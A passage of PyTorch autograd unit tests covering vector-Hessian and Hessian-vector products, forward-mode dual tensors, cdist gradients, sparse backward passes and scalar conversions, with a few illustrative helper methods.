independent of the input return (3 * a).sum() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.vhp(foo, inp, v, strict=True) res = autogradF.vhp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.vhp(bar, inp, v, strict=True) res = autogradF.vhp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.vhp(bar2, inp, v, strict=True) res = autogradF.vhp(bar2, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) 
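    # Sketch of the vhp (vector-Hessian product) API checked above: it returns the
    # pair (function value, v^T H) without ever materializing the full Hessian,
    # which is the point of using it instead of autogradF.hessian. Helper name is
    # illustrative only.
    def _example_vhp_usage(self):
        import torch
        import torch.autograd.functional as autogradF

        def scalar_fn(x):
            return x.exp().sum()

        x = torch.rand(4)
        v = torch.ones(4)
        value, vhp_val = autogradF.vhp(scalar_fn, x, v)
        # For exp().sum() the Hessian is diag(exp(x)), so with v = ones the
        # product v^T H is simply exp(x).
        return value, vhp_val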
def test_vhp_no_grad(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.vhp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.vhp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_vhp_output(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.vhp(foo, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3), torch.rand(4)) v = (torch.ones(3), torch.ones(4)) out, vhp_val = autogradF.vhp(bar, inputs, v) self._assert_same_struct(vhp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(vhp_val[0].grad_fn) self.assertIsNone(vhp_val[1].grad_fn) def test_vhp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.vhp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) inputs = torch.rand([]) v = torch.rand([]) res = autogradF.vhp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) res = autogradF.vhp(reducer, inputs) self._assert_same_struct(res[1], inputs) def bad_reducer(x): return x.sum().view(1, 1, 1) inputs = torch.rand(4, 4) v = torch.rand(4, 4) res = autogradF.vhp(bad_reducer, inputs, v) self._assert_same_struct(res[1], inputs) def test_vhp_create_graph(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) v = torch.ones(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.vhp(foo, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v)) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3, dtype=torch.double, requires_grad=True), torch.rand(4, dtype=torch.double, requires_grad=True)) v = (torch.ones(3, dtype=torch.double, requires_grad=True), torch.ones(4, dtype=torch.double, requires_grad=True)) out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True) self._assert_same_struct(vhp_val, inputs) self.assertIsNotNone(out.grad_fn) self.assertIsNotNone(vhp_val[0].grad_fn) self.assertIsNotNone(vhp_val[1].grad_fn) gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True) return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_hvp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) inp = torch.rand(4) v = torch.rand(4) res = autogradF.hvp(foo, inp, v) with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"): res = 
autogradF.hvp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"): res = autogradF.hvp(bar, inp, v) err_msg_out = "The Tensor returned by the function given to hvp should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.hvp(bar2, inp, v) with self.assertRaisesRegex(RuntimeError, "v has invalid size:"): res = autogradF.hvp(foo, inp, torch.rand(5)) with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"): res = autogradF.hvp(foo, inp, (v, 2)) res = autogradF.hvp(foo, inp, v) self._assert_same_struct(res[1], inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) v = (torch.rand(4), torch.rand(5)) res = autogradF.hvp(foo, inp, v) self._assert_same_struct(res[1], inp) def test_hvp_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is independent of the input return (3 * a).sum() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.hvp(foo, inp, v, strict=True) res = autogradF.hvp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.hvp(bar, inp, v, strict=True) res = autogradF.hvp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.hvp(bar2, inp, v, strict=True) res = autogradF.hvp(bar2, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) 
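    # Companion sketch for hvp (Hessian-vector product): same calling convention as
    # vhp, but it computes H @ v. For the symmetric Hessians of twice-differentiable
    # scalar functions the two coincide up to transposition, and the PyTorch docs
    # suggest preferring vhp when either works, since hvp is built on double
    # backward and is slower. Helper name is illustrative only.
    def _example_hvp_usage(self):
        import torch
        import torch.autograd.functional as autogradF

        def scalar_fn(x):
            return x.exp().sum()

        x = torch.rand(4)
        v = torch.ones(4)
        value, hvp_val = autogradF.hvp(scalar_fn, x, v)
        return value, hvp_val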
def test_hvp_no_grad(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.hvp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.hvp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_hvp_output(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.hvp(foo, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3), torch.rand(4)) v = (torch.ones(3), torch.ones(4)) out, hvp_val = autogradF.hvp(bar, inputs, v) self._assert_same_struct(hvp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(hvp_val[0].grad_fn) self.assertIsNone(hvp_val[1].grad_fn) def test_hvp_scalar(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.hvp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) inputs = torch.rand([]) v = torch.rand([]) res = autogradF.hvp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) res = autogradF.hvp(reducer, inputs) self._assert_same_struct(res[1], inputs) def bad_reducer(x): return x.exp().sum().view(1, 1, 1) inputs = torch.rand(4, 4) v = torch.rand(4, 4) res = autogradF.hvp(bad_reducer, inputs, v) self._assert_same_struct(res[1], inputs) def test_hvp_create_graph(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) v = torch.ones(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.hvp(foo, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v)) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3, dtype=torch.double, requires_grad=True), torch.rand(4, dtype=torch.double, requires_grad=True)) v = (torch.ones(3, dtype=torch.double, requires_grad=True), torch.ones(4, dtype=torch.double, requires_grad=True)) out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True) self._assert_same_struct(hvp_val, inputs) self.assertIsNotNone(out.grad_fn) self.assertIsNotNone(hvp_val[0].grad_fn) self.assertIsNotNone(hvp_val[1].grad_fn) gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True) return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_jacobian_match_vjp_jvp(self): def foo(x): return x ** 3 + x.sum() inputs = torch.rand(4) v = torch.rand(4) jac = autogradF.jacobian(foo, inputs) jvp = autogradF.jvp(foo, inputs, v)[1] vjp = autogradF.vjp(foo, inputs, v)[1] self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1)) self.assertEqual(vjp, torch.mm(v.unsqueeze(0), 
jac).squeeze(0)) def test_hessian_match_vhp_hvp(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4) v = torch.rand(4) hes = autogradF.hessian(foo, inputs) hvp = autogradF.hvp(foo, inputs, v)[1] vhp = autogradF.vhp(foo, inputs, v)[1] self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1)) self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0)) class TestAutogradForwardMode(TestCase): def tearDown(self): # Ensure that a failing test won't make others fail while fwAD._current_level >= 0: fwAD.exit_dual_level() super().tearDown() def test_forward_level_cleanup(self): def get_tensor_and_weak_ref(): # Create a new Tensor and weak reference t = torch.rand(2, requires_grad=True) return t, torch._C._WeakTensorRef(t) # Sanity check that the helper function works as expected t, t_ref = get_tensor_and_weak_ref() self.assertFalse(t_ref.expired()) del t self.assertTrue(t_ref.expired()) # Main test code foo = torch.rand(2) with fwAD.dual_level(): tangent, tangent_ref = get_tensor_and_weak_ref() self.assertFalse(tangent_ref.expired()) dual = fwAD.make_dual(foo, tangent) self.assertFalse(tangent_ref.expired()) # Make sure that the tangent we provided has been re-used as is self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent) # Make sure that dual is keeping the tangent alive del tangent self.assertFalse(tangent_ref.expired()) # Make sure that the dual level does not keep the c++ # version of the tangent alive del dual self.assertTrue(tangent_ref.expired()) def test_size_check(self): foo = torch.rand(2) tangent = torch.rand(3) with fwAD.dual_level(): with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"): dual = fwAD.make_dual(foo, tangent) dual = fwAD.make_dual(foo, tangent[1:]) # The following test functions want to ensure all the following behaviors: # - Ensure that default level system in the python binding works # - Ensure that only level 0 exists and nesting is properly disabled # - Ensure that printing works fine # - Ensure that basic packing/unpacking works # - Ensure that advanced packing/unpacking works # - For memory / version counter share # - For backward AD (regular ops) # - Ensure that view + inplace for both modes work fine # - Ensure we do proper cleanup on exit of a level def test_default_level(self): foo = torch.rand(2) bar = torch.rand(2) with fwAD.dual_level(): baz = fwAD.make_dual(foo, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) # We don't actually need to enforce that these two are the exact same python # object, feel free to relax in the future self.assertIs(baz_tangent, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) self.assertEqual(baz_tangent, None) def test_nested_level(self): with fwAD.dual_level() as level: # For now only level 0 exists self.assertEqual(level, 0) with fwAD.dual_level(): with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"): nest_level = fwAD.enter_dual_level() def test_print(self): with fwAD.dual_level() as level: a = torch.rand(3) self.assertFalse("tangent=" in str(a)) b = fwAD.make_dual(a, torch.rand(3)) self.assertFalse("tangent=" in str(a)) self.assertTrue("tangent=" in str(b)) b_primal, b_tangent = fwAD.unpack_dual(b) self.assertFalse("tangent=" in str(b_primal)) self.assertFalse("tangent=" in str(b_tangent)) def test_basic_packing_unpacking(self): foo = torch.rand(2) bar = torch.rand(2) with fwAD.dual_level(): baz = 
fwAD.make_dual(foo, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) self.assertIs(baz_tangent, bar) # Check that packing/unpacking did not change the input foo_primal, foo_tangent = fwAD.unpack_dual(foo) self.assertEqual(foo_primal, foo) self.assertIsNone(foo_tangent) def test_advanced_packing_unpacking(self): foo = torch.rand(2) bar = torch.ones(2) # Memory and version counter check with fwAD.dual_level(): dual = fwAD.make_dual(foo, bar) # Ensure that they are sharing memory and version counter self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr()) # Ensure we properly share the version counter self.assertEqual(foo._version, dual._version) foo.add_(1) self.assertEqual(foo._version, dual._version) # Unpacking should only create aliases as well dual_primal, dual_tangent = fwAD.unpack_dual(dual) self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr()) self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr()) # And the tangent is actually re-used as-is so it is still the same Tensor self.assertIs(dual_tangent, bar) # Ensure we properly share the version counter self.assertEqual(foo._version, dual_primal._version) foo.add_(1) self.assertEqual(foo._version, dual_primal._version) self.assertEqual(bar._version, dual_tangent._version) bar.add_(1) self.assertEqual(bar._version, dual_tangent._version) # backward mode check with fwAD.dual_level(): foo.requires_grad_() bar.requires_grad_() # Check that backward gradients properly propagates through packing/unpacking dual = fwAD.make_dual(foo, bar) p, t = fwAD.unpack_dual(dual) gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True) self.assertEqual(gfoo, torch.ones_like(foo)) self.assertIsNone(gbar) gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True) self.assertIsNone(gfoo) self.assertEqual(gbar, torch.ones_like(bar)) # Check that forward gradients are impacted by detach() detached_dual = dual.detach() out = detached_dual * 2 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertEqual(p, foo * 2) self.assertIsNone(t) # Check that forward gradients are not impacted by no_grad with torch.no_grad(): out = dual * 3 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertFalse(t.requires_grad) self.assertEqual(p, foo * 3) self.assertEqual(t, bar * 3) # Check that forward gradients are not impacted by inplace detach dual = dual.clone() dual.detach_() out = dual * 2 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertEqual(p, foo * 2) self.assertIsNone(t) def test_view_inplace_non_differentiable_views(self): original_foo = torch.rand(2, dtype=torch.double) original_bar = torch.ones(2, dtype=torch.double) # Do clones to be able to compare the values updated inplace # with the original content of these Tensors foo = original_foo.clone() bar = original_bar.clone() with fwAD.dual_level(): # Note that in this test, we use "update" to mean computing the right tangent for the dual # All the inplace operations here are expected to update the primal value of the Tensors but # not always their tangents. # Also all mentions of "non differentiable view" here means non forward differentiable view # unless specified otherwise. # See note [Forward Grad View/inplace] for more details on how these views work. 
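            # (Quick reminder of the API used below: inside fwAD.dual_level(),
            #  fwAD.make_dual(primal, tangent) attaches a forward-mode tangent to a
            #  tensor, and fwAD.unpack_dual(t) returns a (primal, tangent) pair whose
            #  tangent entry is None when no forward gradient is set.)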
# Check that inplace ops do not update non-differentiable views # Non differentiable view dual = fwAD.make_dual(foo, bar) dual *= 2 # Check that non differentiable view's tangent was not updated self.assertIsNone(fwAD.unpack_dual(foo)[1]) # Check that the computed result is correct self.assertEqual(bar, original_bar * 2) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2) self.assertEqual(foo, original_foo * 2) self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2) # Other non differentiable view dual_primal, dual_tangent = fwAD.unpack_dual(dual) self.assertIsNone(fwAD.unpack_dual(dual_primal)[1]) self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1]) dual_primal *= 2 # Ensure dual's tangent did not change self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2) dual_tangent *= 2 # Ensure dual's primal did not change self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4) def test_view_inplace_differentiable_views(self): original_foo = torch.rand(2) original_bar = torch.ones(2) # Do clones to be able to compare the values updated inplace # with the original content of these Tensors foo = original_foo.clone() bar = original_bar.clone() with fwAD.dual_level(): # Check that inplace ops do update differentiable view but stop at non differentiable ones # A non differentiable view dual = fwAD.make_dual(foo, bar) # A differentiable view view = dual.narrow(0, 0, 1) view *= 2 # Check that non differentiable view was not updated self.assertIsNone(fwAD.unpack_dual(foo)[1]) # Check that differentiable view was updated self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.])) self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.])) # Check that we track differentiable view even for Tensors that are not dual baz = torch.rand(2) baz += dual self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1]) # Updates on view should as well baz = torch.rand(2) baz[0] = dual[0] self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0]) # Unused values get a gradient of 0 self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.) # Check that forward non-differentiable views do prevent gradient update baz = torch.rand(2) view = baz.detach() view += dual self.assertIsNone(fwAD.unpack_dual(baz)[1]) def test_grad_cleanup(self): foo = torch.rand(2) bar = torch.rand(2) baz = torch.rand(2) with fwAD.dual_level(): dual = fwAD.make_dual(foo, bar) self.assertIsNone(fwAD.unpack_dual(foo)[1]) self.assertIs(fwAD.unpack_dual(dual)[1], bar) self.assertIsNone(fwAD.unpack_dual(dual)[1]) with fwAD.dual_level(): self.assertIsNone(fwAD.unpack_dual(foo)[1]) new_dual = fwAD.make_dual(foo, baz) dual_primal, dual_tangent = fwAD.unpack_dual(dual) new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual) self.assertEqual(dual_primal, new_dual_primal) self.assertIsNone(dual_tangent) self.assertEqual(new_dual_tangent, baz) def test_detach_view_tracking(self): # Default detach is both forward and backward non-differentiable foo = torch.rand(2) foo_weak = torch._C._WeakTensorRef(foo) out = foo.detach() del foo self.assertTrue(foo_weak.expired()) # Generic device type autograd tests. 
class TestAutogradDeviceType(TestCase):

    def test_min_max_median_backprops_to_all_values(self, device):
        for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
            x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
            x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
            for x in [x1, x2]:
                y = f(x)
                y.backward()
                self.assertEqual(x.grad.sum(), 1.)
                self.assertEqual((x.grad == 1 / 3).sum(), 3)

    def test_cdist(self, device):
        def _test_euclidean_large_cdist(sizex, sizey=None):
            if sizey is None:
                sizey = sizex
            x = torch.randn(sizex, device=device, dtype=torch.float)
            y = torch.randn(sizey, device=device, dtype=torch.float)
            eps = 1e-6
            # to avoid extremum
            x = x - (((x - y) < eps).float() * 2 * eps)
            x.requires_grad = True
            y.requires_grad = True
            dist = torch.cdist(x, y, p=2)
            # Do a backward pass to check that it is valid for large
            # matrices
            loss = dist.sum()
            loss.backward()

        _test_euclidean_large_cdist((2000, 5))

    # Ensure that cdist backward with p<1 does not produce NaNs
    def test_cdist_grad_p_lt_1_no_nan(self, device):
        for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
            x = torch.randn(1, 2, device=device)
            y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
            x.requires_grad = True
            y.requires_grad = True
            result = torch.cdist(x, y, p=p)
            result.backward(torch.ones_like(result))
            self.assertFalse(torch.isnan(x.grad).any())
            self.assertFalse(torch.isnan(y.grad).any())

    def test_cdist_same_inputs(self, device):
        # Test to detect issues in cdist gradient calculation
        # When the distances are 0
        sizex = (1, 27, 32)
        for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
            x = torch.randn(sizex, device=device, dtype=torch.float)
            dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
            y = x.clone()
            eps = 1e-6
            x.requires_grad = True
            d = torch.cdist(x, y)
            d.backward(dist_grad)
            # Check that the backward pass does not contain invalid
            # values such as nan or inf
            assert torch.isfinite(x.grad).all()

    def test_parameter_resize(self, device):
        asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))

        for i in range(2):
            with torch.no_grad():
                asd.set_(asd[1:])
                asd.grad = None

            m = torch.cat((asd, asd))
            m.sum().backward()

    @dtypes(torch.double, torch.cdouble)
    def test_sparse_ctor_getter_backward(self, device, dtype):
        # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
        def _test(size, sparse_dim, nnz, device):
            v_size = [nnz] + list(size[sparse_dim:])
            i = torch.rand(sparse_dim, nnz)
            i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
            i = i.to(torch.long)

            inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
            other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True,
                                         device=device, dtype=dtype)[0]

            def fn(v):
                x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
                y = (x + other).coalesce()
                yv = y.values()
                new_v = yv.tanh()
                z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
                return z.coalesce().values()

            gradcheck(fn, (inp,), check_batched_grad=False)
            # FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False) # assert that _values is non-differentiable with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"): other.detach().requires_grad_()._values().backward(torch.ones_like(other._values())) for empty_i, empty_v, empty_nnz in product([True, False], repeat=3): sparse_size = [] if empty_i else [2, 1] dense_size = [1, 0, 2] if empty_v else [1, 2] nnz = 0 if empty_nnz else 5 _test(sparse_size + dense_size, len(sparse_size), nnz, device) @dtypes(torch.double, torch.cdouble) def test_sparse_backward(self, device, dtype): class FixedGradientFunction(Function): @staticmethod def forward(ctx, x, grad_x): ctx.save_for_backward(grad_x) return x @staticmethod def backward(ctx, grad_x): saved_grad_x, = ctx.saved_tensors return saved_grad_x, None size = torch.Size([6, 3, 2]) i1 = torch.tensor([ [0, 3, 4], [0, 2, 2], ], dtype=torch.long) v1 = make_tensor([3, 2], dtype=dtype, device=device) sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device) i2 = torch.tensor([ [0, 1, 3, 4], [0, 1, 2, 2], ], dtype=torch.long) v2 = make_tensor([4, 2], dtype=dtype, device=device) sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device) dense_grad = torch.rand(size, device=device, dtype=dtype) fn = FixedGradientFunction # sparse first x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2) # dense first x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2) # sparse only x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, sparse_grad1 + sparse_grad2) # autograd tests via common_method_invocations don't allow input tensors to # be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when # check_sparse_nnz is set to False.) 
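    # Sketch of how sparse gradients usually show up in practice (the test above
    # constructs them by hand through a custom Function): an nn.Embedding created
    # with sparse=True accumulates a sparse .grad on its weight. Helper name is
    # illustrative only.
    def _example_sparse_grad(self):
        import torch

        emb = torch.nn.Embedding(10, 3, sparse=True)
        idx = torch.tensor([1, 2, 4, 5])
        emb(idx).sum().backward()
        assert emb.weight.grad.is_sparse
        return emb.weight.grad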
def test_sparse_mask_autograd(self, device): tensor = torch.randn(3, requires_grad=True, device=device) mask = torch.ones(3, device=device) mask[1] = 0 mask = mask.to_sparse() converted = tensor.sparse_mask(mask).to_dense() converted.sum().backward() self.assertEqual(tensor.grad, mask.to_dense()) def test_pyscalar_conversions(self, device): def _test_pyscalar_conversions(t, integral_conv): # integral -> integral l = t(torch.zeros(1, 1, 1, dtype=torch.long)) pyscalar = -12345 l[0] = pyscalar self.assertEqual(integral_conv(l), pyscalar) # floating point -> floating point f = Variable(t(torch.randn(1, 1, dtype=torch.double))) pyscalar = -12345.1 f[0] = pyscalar self.assertEqual(float(f), pyscalar) f[0] = nan self.assertTrue(math.isnan(float(f))) f[0] = inf self.assertEqual(float(f), inf) f[0] = -inf self.assertEqual(float(f), -inf) # integral -> floating point # check we can convert something that loses precision pyscalar = 1234567890123456789 self.assertNotEqual(pyscalar, integral_conv(float(pyscalar))) l[0] = pyscalar self.assertEqual(float(l), float(pyscalar)) # floating point -> integral f[0] = nan self.assertRaises(ValueError, lambda: integral_conv(f[0])) f[0] = inf self.assertRaises(OverflowError, lambda: integral_conv(f[0])) f[0] = -inf self.assertRaises(OverflowError, lambda: integral_conv(f[0])) f[0] = sys.float_info.max self.assertEqual(integral_conv(f), sys.float_info.max) # bool, nonzero def test_nonzero(tensor, value, expected): tensor[0] = value self.assertEqual(expected, bool(tensor)) self.assertEqual(expected, True if tensor else False) test_nonzero(l, 0, False) test_nonzero(l, -2, True) test_nonzero(f, 0.0, False) test_nonzero(f, sys.float_info.min, True) test_nonzero(f, nan, bool(nan)) test_nonzero(f, inf, bool(inf)) test_nonzero(f, -inf, bool(-inf)) _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x)) @dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64) @dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64) def test_set_requires_grad_only_for_floats(self, device, dtype): def f1(): a = torch.ones(1, dtype=dtype, device=device) a.requires_grad_() def f2(): a = torch.ones(1, dtype=dtype, device=device) a.requires_grad = True def f3(): torch.ones(1, dtype=dtype, device=device, requires_grad=True) a = torch.ones(1, dtype=dtype, device=device) a.requires_grad = False # should always work a.requires_grad_(False) for f in [f1, f2, f3]: if dtype.is_floating_point: f() else: with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)): f() @onlyCUDA def test_advanced_indexing_backwards_large(self, device): # See https://github.com/pytorch/pytorch/issues/22843 n = (1 << 16) x = torch.rand(n, 1, device=device, requires_grad=True) a = x[:, [0]] a.sum().backward() self.assertEqual(x.grad, torch.ones(n, 1, device=device)) def test_advanced_indexing_backwards_memory_format(self, device): # See https://github.com/pytorch/pytorch/issues/36956 shape = (2, 8, 1, 2) i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last) x = torch.randn(shape, requires_grad=True, device=device) x[i].sum().backward() def _test_reentrant_parent_error_on_cpu(self, device): t1 = torch.rand([3, 3], requires_grad=True) t2 = torch.rand([3, 3], device=device, requires_grad=True) t3 = torch.rand([3, 3], device=device, requires_grad=True) # Parent graph cpu graph. 
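        # (t4/t5 below form the CPU-side parent graph; the loop over t2 then builds a
        #  much longer GPU-side graph whose backward is re-entered from inside
        #  ReentrantFunc.backward, so the parent graph can fail while the child is
        #  still executing.)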
